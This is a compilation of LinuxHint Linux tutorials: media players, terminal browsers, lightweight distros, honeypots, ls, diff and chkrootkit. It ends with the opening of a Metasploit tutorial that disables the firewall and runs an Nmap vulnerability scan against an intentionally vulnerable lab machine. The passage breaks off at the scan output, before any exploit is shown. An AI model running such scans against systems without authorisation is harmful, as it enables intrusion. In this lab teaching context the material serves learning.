Playing media in Linux terminal – https://linuxhint.com/play_media_linux_terminal/

In many scenarios we may need to play media from the terminal. This can be achieved with Mplayer and mpv, two great media players for the Linux terminal, and this tutorial focuses on them.

NOTE: It is important to highlight a bug that prevents several terminal media players from playing as the root user by default; for this tutorial, except for installations, please use an unprivileged user. Another point to clarify is that mplayer requires a lot of troubleshooting to play remote videos on websites secured with SSL. While this tutorial shows how to play local media in the Linux terminal with both Mplayer and Mpv, with Mplayer I will show how to play videos on http websites, while with Mpv I will show how to play videos on https websites such as Youtube.

To begin, let's install mplayer by running:

# apt install mplayer

Once installed, play a local video by running mplayer followed by the file name:

# mplayer What\ is\ Kubernetes.mp4

A new window will open showing the video (in this case the video "What is Kubernetes" from LinuxHint's Youtube channel).

With your keyboard arrows you can seek through the video, and you can pause it with the Space key.

Playing remote media from websites in the Linux terminal:

Now you'll see how to play videos from websites in your Linux terminal. The first way, using mplayer, is almost obsolete and only allows playing videos from sites without SSL certificates; later you'll see how to play videos on secured websites. To continue, we need to edit the mplayer configuration file in the home directory of the user we are playing with. With nano or any text editor, edit the file located at <YourHome>/.mplayer/config

In my case:

# nano /home/linuxhint/.mplayer/config

Within the configuration file add the following line (this disables LIRC remote-control support):


lirc=no

As shown below:

Press CTRL+X and Y to save and exit.

Now we can test it:

# mplayer http://www.aemet.es/documentos_d/eltiempo/prediccion/videos/202002121902_videoeltiempoAEMET.mp4

And the video shows up.

Another terminal media player is mpv, which is based on mplayer. To install it, on the terminal run:

# apt install mpv -y

Once installed, to play a video just run:

# mpv <Video-Name>

In this case:

# mpv What\ is\ Kubernetes.mp4

To play remote media files, for example from Youtube, we need a workaround first. On the terminal run:

#  sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/bin/youtube-dl
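
The downloaded youtube-dl script also needs execution permissions; following youtube-dl's own installation instructions, an additional step like this is assumed:

# sudo chmod a+rx /usr/bin/youtube-dl

Now you can play a remote video from Youtube: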

# mpv https://www.youtube.com/watch?v=Bxxa5UQ6Ma4

Playing remote videos from a specific timestamp is also possible with Mpv using the following syntax:

# mpv --start=05:00 https://www.youtube.com/watch?v=IMOZCDhH7do

The command above will play the specified video from minute 5. You can change the start time by editing the --start=05:00 option.
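
For example, mpv also accepts a plain seconds value for --start, so starting 150 seconds into the same video would be:

# mpv --start=150 https://www.youtube.com/watch?v=IMOZCDhH7do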

Additional tips:

By pressing the f key you can make the video full screen, and you can restore the default size by pressing f again or ESC; these options are the same for Mplayer. By pressing Ctrl + and Ctrl - you can increase and decrease the audio delay, which is useful when the audio and video aren't in sync. With the r and t keys you can change the subtitles position.

You can find more options for the MPV player in its man page or online at https://manpages.debian.org/jessie/mpv/mpv.1. For Mplayer options you can also see https://linux.die.net/man/1/mplayer.

Additional terminal media players:

Another option to play media from the Linux console is mpg123, a console MP3 player. You can install it by running:

# apt install mpg123 -y
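
Once installed you can play audio files from the terminal; for example, assuming a local file named song.mp3 (a hypothetical filename), run:

# mpg123 song.mp3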

There are also music-only players, without video support, such as Music Player Daemon.

Conclusion:

Playing videos from the terminal is a good solution, yet the default program configurations fail to play the most popular video websites such as Youtube. Users on every OS for which the mentioned programs are available (Windows, MacOS and Linux) report difficulties and rely on customized solutions to achieve remote playback from the terminal. For ssh sessions the best option remains copying the media files to the local device and playing them there.

For playing remote videos, the troubleshooting process includes editing ~/.config/mpv/mpv.conf and adding "no-ytdl"; if necessary you will need to create mpv's configuration file. In other cases the no-ytdl option will need to be disabled to play; this option is used to bypass the built-in ytdl_hook.lua script, which sometimes brings problems. You may also need to downgrade your youtube-dl, which you can achieve by running "sudo pip install youtube_dl==2017.07.30.1".
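
As a reference, a minimal ~/.config/mpv/mpv.conf for this case could contain a single line disabling the ytdl hook (ytdl=no is the config-file form of the no-ytdl option; whether you need it depends on your setup, as explained above):

ytdl=no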

VLC Player, despite not being a terminal video player, remains the best option for remote media playing. If you need help with VLC, LinuxHint has 2 clear articles for you to read at https://linuxhint.com/install-vlc-media-player-2-2-x-linux/ and https://linuxhint.com/vlc-media-player-for-linux/.

I hope you found this tutorial on Playing media in Linux terminal useful. Keep following LinuxHint for more tips and updates.

Browsing the web from the Linux terminal – https://linuxhint.com/browse_web_linux_terminal/

In some scenarios, you may want to browse websites from your Linux terminal, for example when you don't have an X window manager available or when you don't have a good internet connection. When using 3G/4G or slow connections, browsing websites from the terminal is a great option to increase speed and save bandwidth. This tutorial shows 4 terminal browsers: lynx, links, links2 and elinks.

Browsing the web from Linux terminal with lynx:

Let's begin with the lynx console web browser. It is important to clarify that this is the only terminal web browser in this article which doesn't support mouse integration.

To begin installing the terminal web browser lynx, on Debian and Debian-based Linux distributions run:

# apt install lynx -y

Once installed, using lynx is pretty easy: just call the program and specify the website you want to browse by running:

# lynx linuxhint.com

Despite lynx being simple, it isn't as intuitive as it seems: instead of using the arrow keys on your keyboard to move from one place to another, use the SPACE key to move down and the B key to move up. When you reach the section you want to browse into, just press ENTER.

If you want to go back to the previous page press the left arrow key on your keyboard; to go forward press the right arrow key.

By pressing the M key you can return to the website homepage; a confirmation will be requested as shown in the screenshot below:
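
Lynx can also be used non-interactively; for example, to dump a page as plain text into a file (page.txt is just an example filename) run:

# lynx -dump linuxhint.com > page.txt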

You can get more usage tips on lynx online at https://linux.die.net/man/1/lynx.

Browsing the web from Linux terminal with links:

Links is another great option to browse the web from the terminal, and it supports mouse integration.

To begin installing the links terminal web browser, on the terminal run:

# apt install links -y

As with lynx and the rest of the terminal web browsers, call the program specifying the destination website with the following syntax:

# links linuxhint.com

The site will show up with a Welcome screen from links; press ENTER to close the welcome screen and get the website:

Press ENTER on OK and the website will show up:

As said previously, links supports mouse integration, if a mouse is present, and you can use it to click on any section of the website you want to visit. As with lynx, you can use the left and right arrow keys on your keyboard to move a page back or forward.

By pressing the ESC key, you can display the main menu shown on the top of the screenshot below:

This main menu includes:

File: this menu includes the options go back, go forward, history, reload, bookmarks, new window, save as, save url as, save formatted document and kill background or all connections and flush the cache.

View: this submenu includes the options search, search backward, find next, find previous, toggle html/plain, document info, header info, frame at full-screen, save clipboard to a file, load clipboard from a file, html options and save html options.

Link: this submenu includes options follow link enter, open in new window and download link.

Downloads: here you are able to see downloaded and downloading files.

Setup: here you are able to specify language, terminal options, margins, cache, options associated with mail and telnet, blocked images and additional options.

Help: this is the help submenu.

For more links web browser options you can visit https://linux.die.net/man/1/links.

Browsing the web from Linux terminal with links2:

As done with the previous web browsers, to install links2 on Debian-based Linux distributions run:

# apt install links2

Then, once installed, on the terminal call the program specifying the website:

# links2 linuxhint.com

Then the site will show up:

Like its predecessor links, links2 also supports mouse integration, and the keys are the same for links and links2, including the ESC key to display the main menu bar.
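
If your environment supports it, links2 can also render pages in graphics mode with the -g switch (a framebuffer or X session is assumed):

# links2 -g linuxhint.com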

There are more options available for links2, which you can read about in its man page: https://linux.die.net/man/1/links2.

Browsing the web from Linux terminal with Elinks:

Elinks is the last web browser of this article. To install it, on the console run:

# apt install elinks -y

Then run it specifying the website as shown below:

# elinks linuxhint.com

As with links and links2, you can display a similar main menu in elinks by pressing the ESC key.

Elinks usage is similar: you can use the left and right arrow keys on your keyboard to go back and forward, and press ENTER on the item you want to enter. Elinks also supports mouse integration like links and links2.

For elinks execution options visit: https://linux.die.net/man/1/elinks

I hope you found this tutorial on Browsing the web from Linux terminal useful. Keep following LinuxHint for more tips and updates.

Linux distributions for low resources computers – https://linuxhint.com/linux_distributions_distros_low_resource_computers/

The present review of Linux distributions for low resource computers isn't oriented to Linux users only, but to anyone with an old hardware PC that can be recycled. This includes regular Windows users, who don't have this possibility with modern Windows OS: without Linux distributions oriented to low resource devices, Windows users could only install old, outdated and unsafe Windows versions such as XP, with a lot of compatibility issues with modern software and hardware. If Linux is a great, and maybe the best, option for everyone, Linux distributions for low resource devices seem to be the only well-supported option for old computers.

This article briefly describes Puppy Linux, Lubuntu, LXLE, AntiX Linux and SparkyLinux.

Puppy Linux distribution for low resource computers:

Puppy Linux is a minimalist Linux distribution oriented to low resource devices. Contrary to the rest of the Linux distributions mentioned in this article, Puppy Linux isn't based on a single specific Linux distribution (it was once based on Vector Linux, but not today); it uses packages compatible with different distributions ranging from Ubuntu to Slackware.

The minimum requirements for Puppy Linux are 250 MB of RAM and a 900 MHz processor, and the whole OS can be contained on a 600 MB CD or a small pendrive.

You can download Puppy Linux distribution from http://puppylinux.com/index.html#download.

Lubuntu Linux distribution for low resource computers:

Lubuntu Linux is an Ubuntu-based Linux distribution oriented to low resource devices.
The first Lubuntu hardware requirements were low and similar to those of Windows XP: compatible with Pentium 2 and Pentium 3 processors with a minimum of 512 MB of RAM; those old versions were also available for PowerPC computers. Recent versions require a Pentium 4 and no longer support PowerPC. Of course, despite being oriented to low resource devices, it can be used on powerful computers too. Instead of bringing Gnome by default like Ubuntu, Lubuntu uses the LXQt desktop environment, which is suitable for low resource devices and is already translated into many languages. This desktop environment is also optionally used by Debian, Manjaro, Fedora and OpenSUSE, among other Linux distributions. Two years after its initial launch Lubuntu was recognized as an official Ubuntu flavor.

You can get Lubuntu at https://lubuntu.me/downloads/.

LXLE Linux distribution for low resource computers:

It is a Linux distribution based on the previously mentioned Lubuntu.
Despite LXLE being a great option for low resource devices, Lubuntu remains more user friendly: on LXLE some repositories may tend to be unavailable, and for foreign users who don't want English as the main language, translations are not complete. Yet it is a lot faster than regular Ubuntu, compatible with Pentium 3 processors, and can be installed on hard disks with less than 10 GB with great performance.

Like any Linux distribution oriented to low resources, LXLE brings software optimized for that purpose, such as the lightweight SeaMonkey web browser based on Mozilla code, or AbiWord and Gnumeric instead of LibreOffice. Despite being based on a modern Ubuntu, LXLE keeps kernel 4 by default.
You can download LXLE from https://lxle.net/download/.

AntiX Linux distribution for low resource computers:

Contrary to Lubuntu and LXLE, AntiX Linux is a distribution oriented to low resource computers based on Debian. It is even lighter than the previously mentioned distributions: it runs with 256 MB of RAM and requires a minimum of 4 GB on the hard disk to be installed, and like Lubuntu it is also compatible with modern devices.
AntiX Linux offers 3 versions: the Full version, which includes widely used applications by default (even Synaptic); the Base version, with a customized application installation; and the Core-libre version, which fully customizes the installation.

You can get AntiX Linux distribution at https://antixlinux.com/download/.

SparkyLinux distribution for low resource computers:

SparkyLinux is based on Debian and uses LXDE as the default desktop environment, with around 20 additional optional desktop environments the user can set.
It brings a version for gamers, another for multimedia professionals and one for technicians or users who need to fix an OS which can't boot.
Additionally there is a more minimalist version without an X server.

You can get SparkyLinux at https://sparkylinux.org/download/.

Conclusion:

Except for the Puppy Linux releases based on Slackware, all distributions mentioned in this article are user friendly and among the best options to recycle old computers while getting high performance without losing modernity and security.

These distributions are also a good option if you need to virtualize an OS without taking considerable resources from the host computer while avoiding a performance loss on the guest side.

I hope you found this article on Linux distributions for low resources computers useful. Keep following LinuxHint for more tips and updates.

Honeypots and Honeynets – https://linuxhint.com/honeypots_honeynets/

Part of the work of IT security specialists is to learn about the types of attacks, or techniques, used by hackers, collecting information for later analysis in order to evaluate the characteristics of attack attempts. Sometimes this collection of information is done through baits, or decoys, designed to register the suspicious activity of potential attackers who act without knowing their activity is being monitored. In IT security these baits or decoys are called Honeypots.

A honeypot may be an application simulating a target which is really a recorder of the attackers' activity. Multiple honeypots simulating multiple related services, devices and applications are called Honeynets.

Honeypots and Honeynets don't store sensitive information; they store fake information that is attractive to attackers in order to get them interested in the Honeypots or Honeynets. In other words, we are talking about hacker traps designed to learn their attack techniques.

Honeypots offer two types of benefits: first, they help us learn about attacks so we can later secure our production device or network properly. Second, by keeping honeypots simulating vulnerabilities next to production devices or networks, we keep the hackers' attention away from the secured devices, since they will find the honeypots simulating exploitable security holes more attractive.

There are different types of Honeypots:

Production Honeypots:

This type of honeypot is installed in a production network to collect information on techniques used to attack systems within the infrastructure. This type of honeypot offers a wide variety of possibilities, from placing the honeypot within a specific network segment in order to detect internal attempts by legitimate network users to access unallowed or forbidden resources, to a clone of a website or service, identical to the original, used as bait. The biggest issue with this type of honeypot is allowing malicious traffic in among legitimate traffic.

Development honeypots:

This type of honeypot is designed to collect as much information as possible on hacking trends, targets desired by attackers and attack origins. This information is later analyzed for the decision-making process on implementing security measures.

The main advantage of this type of honeypot is that, contrary to production honeypots, development honeypots are located within an independent network dedicated to research; this vulnerable system is separated from the production environment, preventing an attack from the honeypot itself. Its main disadvantage is the quantity of resources necessary to implement it.

There is also a classification of honeypots into 3 subcategories, defined by the level of interaction they have with attackers.

Low Interaction Honeypots:

The honeypot emulates a vulnerable service, app or system. This is very easy to set up, but limited when collecting information. Some examples of this type of honeypot are:

Honeytrap: it is designed to observe attacks against network services; contrary to other honeypots which focus on capturing malware, this type of honeypot is designed to capture exploits.

Nepenthes: emulates known vulnerabilities in order to collect information on possible attacks; it is designed to emulate the vulnerabilities worms exploit to propagate, and then Nepenthes captures their code for later analysis.

HoneyC: identifies malicious web servers within the network by emulating different clients and collecting server responses when replying to requests.

HoneyD: is a daemon which creates virtual hosts within a network which can be configured to run arbitrary services simulating execution in different OS.

Glastopf: emulates thousands of vulnerabilities designed to collect attacks information against web applications. It is easy to setup and once indexed by search engines it becomes an attractive target to hackers.

Medium Interaction Honeypots:

These honeypots are more interactive than the previous type, but without allowing the level of interaction that high interaction honeypots allow. Some honeypots of this type are:

Kippo: it is an ssh honeypot used to log brute force attacks against Unix systems and to log the activity of the hacker if access was gained. It was discontinued and replaced by Cowrie.

Cowrie: another ssh and telnet honeypot which logs brute force attacks and the hackers' shell interaction. It emulates a Unix OS and works as a proxy to log the attacker's activity.

Sticky_elephant: it is a PostgreSQL honeypot.

Hornet: an improved version of honeypot-wasp with a fake credentials prompt, designed for websites with a publicly accessible login page for administrators, such as /wp-admin for WordPress sites.

High Interaction Honeypots:

In this scenario honeypots aren't designed to collect information only; they are applications designed to interact with attackers while exhaustively registering the interaction activity, simulating a target capable of offering all the answers the attacker may expect. Some honeypots of this type are:

Sebek: works as a HIDS (Host-based Intrusion Detection System), allowing to capture information on a system's activity. It is a server-client tool capable of deploying honeypots on Linux, Unix and Windows which capture and send the collected information to the server.

HoneyBow: can be integrated with low interaction honeypots to increase information collection.

HI-HAT (High Interaction Honeypot Analysis Toolkit): converts PHP files into high interaction honeypots with a web interface available to monitor the information.

Capture-HPC: similar to HoneyC, identifies malicious servers by interacting with them as clients using a dedicated virtual machine and registering unauthorized changes.

If you are interested in honeypots, IDS (Intrusion Detection Systems) will probably be interesting for you too; at LinuxHint we have a couple of interesting tutorials about them.

I hope you found this article on Honeypots and Honeynets useful. Keep following LinuxHint for more tips and updates on Linux and security.

How to List Files Ordered by Size in Linux – https://linuxhint.com/list_files_ordered_by_size/

The present article briefly explains how to list or display files and directories ordered by size. This can be easily achieved with the command ls (list). Before sorting the files, in order to explain each option applied, let's do a long listing which will print file sizes, among other information, without sorting (the second screenshot explains how to sort). This is achieved by adding the -l option (lowercase l, for long listing) as shown below:

# ls -l

The first line ("total") displays the total disk space used by the listed files. When adding the -l option the output displays file permissions in the first column, then the number of hard links, the owner, the group, the size in bytes, the month, day and time, and finally the filename.

If you want to sort this output according to file size, from bigger to smaller, you need to add the -S (sort by size) option.

# ls -lS

As you can see the output lists the files and directories sorted by size, but in bytes, which is not very human friendly (1 byte is 0.000001 MB in decimal and 0.00000095367432 MB in binary).

To print the output in a human friendly way you only need to add the -h (human readable) option:

# ls -lSh

As you can see in the output above, file sizes are now shown in GB, MB, KB and bytes.
Yet you are only seeing regular files, without hidden files; if you want to include hidden files in the output you need to add the -a (all) option as shown below:

# ls -lSha

As you can see hidden files (starting with a dot) are printed too now.
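
One more variation: if you prefer the order inverted, from smallest to biggest, ls also accepts the -r (reverse) option combined with the previous flags:

# ls -lShar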

Additional tips:

The following additional tips will help you limit the output to a specific size unit other than bytes. The problem with this option is that the output is never exact when the file size isn't an exact multiple of that unit, since sizes are rounded up.

If you want to print the sizes in a specific unit only, instructing ls to display all files with the closest size in that unit, you can achieve it with the --block-size= option. For example, to print all file sizes in MB, specify MB with M as shown in the syntax and screenshot below:

# ls -lS --block-size=M

As you can see, now the size is in MB only; the biggest file is 115 MB, the second 69 MB, etc. Files of KB or byte size won't be printed accurately; they will be shown as 1 MB, which is the closest size that can be printed when limited to MB.
The rest of the output remains exactly the same.

Using the same option (--block-size=) you can display the output in GB instead of MB or bytes; the syntax is the same, just replace the M with a G as in the example below:

# ls -lS --block-size=G

You can also print the size in KB units by replacing the M or G with a K:

# ls -lS --block-size=K

All the examples above will list files and directories sorted by size in the unit you want, with the problem clarified above: the output won't be accurate for files which don't match an exact unit size. Additionally, these examples didn't include hidden files (which start with a .). To include them you need to add the -a (all) option; therefore, to print files sorted by size in bytes including hidden files run:

# ls -laS

As you can see now hidden files, starting with a . (dot) are printed, such as .xsession-errors, .ICEauthority, etc.

If you want to print files and directories sorted by size in MB including hidden files run:

# ls -laS --block-size=M

To print or display all files and directories sorted by size shown in GB including hidden files run:

# ls -laS --block-size=G

Similarly to previous commands, to print files and directories ordered by size shown in KB including hidden files run:

# ls -laS --block-size=K

Conclusion:

The command ls brings a lot of functionality which helps us manage files and print information about them. Another example could be using ls to list files by date (with the -lt options).
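
For instance, to list files sorted by modification time, newest first, you can run:

# ls -lt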

I hope you found this tutorial on How to list all files ordered by size in Linux useful. Keep following LinuxHint for more tips and updates on Linux and networking.

diff Command Examples in Linux – https://linuxhint.com/diff_command_examples/

The diff command is an analysis or informative command which prints the differences between files, analyzing them line by line, or directories recursively, while informing the user what changes are necessary to make the files equal; this point is important to understand diff outputs. This tutorial focuses on the diff command.

Before starting, create two files using any text editor (nano is used in this tutorial) with the same content:

# nano diffsample1

Inside paste:


LinuxHint publishes
the best
content for you

Press CTRL+X and Y to save and exit.

Create a second file called diffsample2 with the same content:

# nano diffsample2

Note: pay attention to spaces and tabs, files must be 100% equal.

Press CTRL+X and Y to save and exit.

# diff diffsample1 diffsample2

As you can see there is no output: nothing needs to be done to make the files equal because they are already equal.

Now let's edit the file diffsample2 to make some change:

# nano diffsample2

Then let's replace the word "content" with "tips":

Press CTRL+X and Y to save and exit.

Now run:

# diff diffsample1 diffsample2

Let's see the output:
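
With the two example files used above, the output looks like this (reconstructed here; your exact output depends on your files):

3c3
< content for you
---
> tips for you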

In the output above, "3c3" means "line 3 of the first file should be replaced with line 3 of the second file". The friendly part of the output is that it shows us what text must be changed ("content for you" for "tips for you").

This shows us that the reference for the diff command isn't the first file but the second one; that's why the first file's third line (the first 3) must be changed (c) to match the third line of the second file (the second 3).

The command diff can show 3 characters:

c: this character indicates a Change must be done.
a: this character indicates something must be Added.
d: this character indicates something must be Deleted.

The numbers before the character belong to the first file, while the numbers after the character belong to the second file.

The symbol < marks lines from the first file and the symbol > marks lines from the second file, which is used as reference.

Let's invert the file order; instead of running

# diff diffsample1 diffsample2

run:

# diff diffsample2 diffsample1

You can see how the order was inverted and now the diffsample1 file is used as reference, and it instructs us to change "tips for you" to "content for you", the inverse of the previous output:

Now let’s edit the file diffsample1 like this:

Remove all lines except the first one from the file diffsample1. Then run:

# diff diffsample2 diffsample1

As you can see, since we used the file diffsample1 as reference, in order to make the file diffsample2 equal we need to delete (d) its lines two and three (2,3), so that, as in the first file, only the first lines (1) remain and are equal.

Now let's invert the order; instead of running "# diff diffsample2 diffsample1" run:

# diff diffsample1 diffsample2

As you can see, while the previous example instructed us to remove lines, this one instructs us to add (a) lines 2 and 3 after the first file's first line (1).

Now let's work with the case sensitivity of this program.

Edit the file diffsample2 like:

And edit the file diffsample1 as:

The only difference is the capital letters in the file diffsample2. Now let's compare the files using diff again:

# diff diffsample1 diffsample2

As you can see, diff found differences: the capital letters. If we aren't interested in case sensitivity, we can prevent diff from detecting the capital letters by adding the -i option:

# diff -i diffsample1 diffsample2

No differences were found; case detection was disabled.

Now let's change the output format by adding the -u option, used to print unified output:
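
With the same files as before, the full command would be:

# diff -u diffsample1 diffsample2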

In addition to the date and time, the output shows with - and + symbols what should be removed and what should be added in order to make the files equal.

At the start of this article I said spaces and tabs must be equal in both files, since they are also detected by the diff command. If we want diff to ignore spaces and tabs we need to apply the -w option.

Open the file diffsample2 and add spaces and tabs:

As you see, I added a couple of tabs after "the best" in the second line and also spaces in all lines. Close and save the file and run:

# diff diffsample1 diffsample2

As you can see, differences were found in addition to the capital letters. Now let's apply the -w option to instruct diff to ignore blank spaces:
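
Keeping the same file order as before, the command is:

# diff -w diffsample1 diffsample2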

As you see, despite the tabulation, diff only found the capital letters as a difference.
Now let's add the -i option again:

# diff -wi diffsample2 diffsample1

The diff command has dozens of available options to ignore content, change the output, discriminate columns when present, etc. You can get additional information on these options using the man command, or at http://man7.org/linux/man-pages/man1/diff.1.html. I hope you found this article with diff command examples in Linux useful. Keep following LinuxHint for more tips and updates on Linux and networking.

How to Install Chkrootkit – https://linuxhint.com/install_chkrootkit/

This tutorial focuses on rootkits and how to detect them using chkrootkit. Rootkits are tools designed to grant access or privileges while hiding their own presence, or the presence of additional software granting the access; the term "rootkit" focuses on the hiding aspect. To achieve hiding, malicious software rootkits manage to integrate into the target's kernel, software, or in the worst case within hardware firmware.

Usually, when the presence of a rootkit is detected, the victim needs to reinstall the OS, analyze the files to be transferred to the replacement installation, and in the worst case replace the hardware. It is important to highlight the possibility of false positives; this is the main problem of chkrootkit, therefore when a threat is detected the recommendation is to run additional alternatives before taking measures. This tutorial will also briefly explore rkhunter as an alternative. It is also important to say that this tutorial is optimized for users of Debian and Debian-based Linux distributions; the only limitation for users of other distributions is the installation part, the usage of chkrootkit is the same for all distros.

Since rootkits have a variety of ways to achieve their goal of hiding malicious software, chkrootkit offers a variety of tools to cover these ways. Chkrootkit is a tool suite which includes the main chkrootkit program and additional programs, which are listed below:

chkrootkit: the main program, which checks operating system binaries for rootkit modifications to learn if the code was adulterated.

ifpromisc.c: checks if the interface is in promiscuous mode. If a network interface is in promiscuous mode, it can be used by an attacker or malicious software to capture the network traffic to later analyze it.

chklastlog.c: checks for lastlog deletions. Lastlog is a command which shows information on last logins. An attacker or rootkit may modify the file to avoid detection if the sysadmin checks this command to learn information on logins.

chkwtmp.c: checks for wtmp deletions. Similarly to the previous script, chkwtmp checks the file wtmp, which contains information on users' logins, to try to detect modifications on it in case a rootkit modified the entries to prevent detection of intrusions.

check_wtmpx.c: this script is the same as the above but for Solaris systems.
chkproc.c: checks for signs of trojans within LKMs (Loadable Kernel Modules).
chkdirs.c: has the same function as the above; checks for trojans within kernel modules.
strings.c: a quick and dirty strings replacement, dealing with strings that hide the nature of the rootkit.
chkutmp.c: this is similar to chkwtmp but checks the utmp file instead.

All the scripts mentioned above are executed when we run chkrootkit.

To begin installing chkrootkit on Debian and Debian-based Linux distributions run:

# apt install chkrootkit -y

Once installed, run it by executing:

# sudo chkrootkit

During the process you can see all the scripts integrating chkrootkit being executed, each doing its part.

You can get a more comfortable, scrollable view by adding a pipe to less:

# sudo chkrootkit | less

You can also export the results to a file using the following syntax:

# sudo chkrootkit > results

Then to see the output type:

# less results

Note: you can replace "results" with any name you want to give the output file.

By default you need to run chkrootkit manually as explained above, yet you can define daily automatic scans by editing the chkrootkit configuration file located at /etc/chkrootkit.conf. Open it using nano or any text editor you like:

# nano /etc/chkrootkit.conf

To achieve a daily automatic scan, the first line containing RUN_DAILY="false" should be edited to RUN_DAILY="true".

This is how it should look:
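
The relevant line, once edited, should read as follows (a minimal sketch; the rest of the file is left as shipped):

RUN_DAILY="true"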

Press CTRL+X and Y to save and exit.

Rootkit Hunter, an alternative to chkrootkit:

Another option to chkrootkit is Rootkit Hunter. It is also a complement: if you found rootkits using one of them, using the alternative is mandatory to discard false positives.

To begin with Rootkit Hunter, install it by running:

# apt install rkhunter -y

Once installed, to run a test execute the following command:

# rkhunter --check

As you can see, like chkrootkit, the first step of rkhunter is to analyze the system binaries, but also libraries and strings:

As you will see, contrary to chkrootkit, rkhunter will request you to press ENTER to continue with the next steps; having checked the system binaries and libraries, it will now go for known rootkits:

Press ENTER to let rkhunter go ahead with the rootkit search:

Then, like chkrootkit, it will check your network interfaces, and also ports known for being used by backdoors or trojans:

Finally it will print a summary of the results.
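
If you prefer running the whole check without pressing ENTER between stages, rkhunter also accepts the --sk (skip keypress) option:

# rkhunter --check --sk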

You can always access results saved at /var/log/rkhunter.log:

If you suspect your device may be infected by a rootkit or compromised you can follow the recommendations listed at https://linuxhint.com/detect_linux_system_hacked/.

I hope you found this tutorial on How to install, configure and use chkrootkit useful. Keep following LinuxHint for more tips and updates on Linux and networking.

10 Metasploit usage examples – https://linuxhint.com/metasploit_usage_examples/

Metasploit is a security framework that comes with many tools for system exploitation and testing. This tutorial shows 10 examples of hacking attacks against a Linux target. The Linux target is Metasploitable 2, a training environment OS which is intentionally vulnerable so users can learn how to exploit its vulnerabilities. This tutorial only focuses on 10 specific metasploit attacks; for information on Metasploitable 2 installation read more here. To begin, download Metasploit.

In my case I have downloaded the Metasploit Pro Free trial, but you can get any of them.
The following screen will require some of your personal information; fill it in to pass to the download page:

Download Metasploit for Linux:

Give the installer you just downloaded execution rights by running:

# chmod +x metasploit-latest-linux-x64-installer.run

Then execute Metasploit by running:

# ./metasploit-latest-linux-x64-installer.run

As you see, an installer GUI shows up; click on Forward to continue:

In the next screen accept the license agreement and click on Forward:

Leave the default directory and press Forward:

When asked whether to install Metasploit as a service, the recommendation is not to. If you do, the Metasploit service will start every time you boot; if you press No, the Metasploit service will be launched only upon your request. Select your choice and press Forward to continue:

In order to avoid interferences when using Metasploit, turn off your firewall and press Forward to continue:

Unless the shown port is already used, press Forward to continue:

Leave localhost and press Forward to continue:

Then to proceed with the installation press Forward for the last time:

The installation process will begin:

Finally Metasploit is installed. Despite the fact that we are not going to work with the Metasploit web interface, you can mark it to keep it available. Press Finish to end.

Troubleshooting Metasploit DB error:

In my case when I launched Metasploit it returned the error:



No database support: could not connect to server: Connection refused Is the server running
on host "localhost" (::1) and accepting TCP/IP connections on port 7337?

The reason for this error is that the dependency PostgreSQL wasn't installed, and neither was the Metasploit service.

To solve it run:

# apt install -y postgresql

Then start PostgreSQL by running:

# sudo service postgresql start

And finally start Metasploit service:

# sudo service metasploit start

Now run msfconsole again and you’ll notice the error disappeared and we are ready to attack Metasploitable 2:
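
That is, launch the console again from the terminal:

# msfconsole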

Using Metasploit to scan a target for vulnerabilities:

The first step is to scan our target to discover services and vulnerabilities on it. In order to achieve this we will use Nmap from Metasploit and its NSE (Nmap Scripting Engine) vuln script, used to detect vulnerabilities:

# db_nmap -v --script vuln 192.168.0.184

NOTE: replace 192.168.0.184 with your target IP address or host.

Let’s analyze Nmap’s output:

IMPORTANT: Nmap output contained over 4000 lines, therefore the output was shortened leaving relevant information to be explained.

The following lines just show us the initialized types of scans, which involve NSE, ARP Ping Scan, DNS resolution and a SYN Stealth Scan. All these steps were already clearly explained at linuxhint.com in Nping and Nmap arp scan, Using nmap scripts and Nmap Stealth Scan.

Note that NSE contains pre-scanning, during-scan and post-scanning scripts, which run before, during and after the scan process.


msf5 > db_nmap -v --script vuln 192.168.0.184
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-04 16:56 -03
[*] Nmap: NSE: Loaded 103 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 16:56
[*] Nmap: Completed NSE at 16:57, 10.00s elapsed
[*] Nmap: Initiating NSE at 16:57
[*] Nmap: Completed NSE at 16:57, 0.00s elapsed
[*] Nmap: Initiating ARP Ping Scan at 16:57
[*] Nmap: Scanning 192.168.0.184 [1 port]
[*] Nmap: Completed ARP Ping Scan at 16:57, 0.05s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 16:57
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 16:57, 0.02s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 16:57
[*] Nmap: Scanning 192.168.0.184 [1000 ports]

The next extract shows what services are available at our target:


[*] Nmap: Discovered open port 25/tcp on 192.168.0.184
[*] Nmap: Discovered open port 80/tcp on 192.168.0.184
[*] Nmap: Discovered open port 445/tcp on 192.168.0.184
[*] Nmap: Discovered open port 139/tcp on 192.168.0.184
[*] Nmap: Discovered open port 3306/tcp on 192.168.0.184
[*] Nmap: Discovered open port 5900/tcp on 192.168.0.184
[*] Nmap: Discovered open port 22/tcp on 192.168.0.184
[*] Nmap: Discovered open port 53/tcp on 192.168.0.184
[*] Nmap: Discovered open port 111/tcp on 192.168.0.184
[*] Nmap: Discovered open port 21/tcp on 192.168.0.184
[*] Nmap: Discovered open port 23/tcp on 192.168.0.184
[*] Nmap: Discovered open port 1099/tcp on 192.168.0.184
[*] Nmap: Discovered open port 512/tcp on 192.168.0.184
[*] Nmap: Discovered open port 1524/tcp on 192.168.0.184
[*] Nmap: Discovered open port 513/tcp on 192.168.0.184
[*] Nmap: Discovered open port 514/tcp on 192.168.0.184
[*] Nmap: Discovered open port 2121/tcp on 192.168.0.184
[*] Nmap: Discovered open port 6000/tcp on 192.168.0.184
[*] Nmap: Discovered open port 2049/tcp on 192.168.0.184
[*] Nmap: Discovered open port 6667/tcp on 192.168.0.184
[*] Nmap: Discovered open port 8009/tcp on 192.168.0.184
[*] Nmap: Discovered open port 5432/tcp on 192.168.0.184
[*] Nmap: Discovered open port 8180/tcp on 192.168.0.184
[*] Nmap: Completed SYN Stealth Scan at 16:57, 0.12s elapsed (1000 total ports)

The following extract reports NSE script execution during the scan to find vulnerabilities:


[*] Nmap: NSE: Script scanning 192.168.0.184.
[*] Nmap: Initiating NSE at 16:57
[*] Nmap: Completed NSE at 17:02, 322.44s elapsed
[*] Nmap: Initiating NSE at 17:02
[*] Nmap: Completed NSE at 17:02, 0.74s elapsed
[*] Nmap: Nmap scan report for 192.168.0.184
[*] Nmap: Host is up (0.00075s latency).
[*] Nmap: Not shown: 977 closed ports

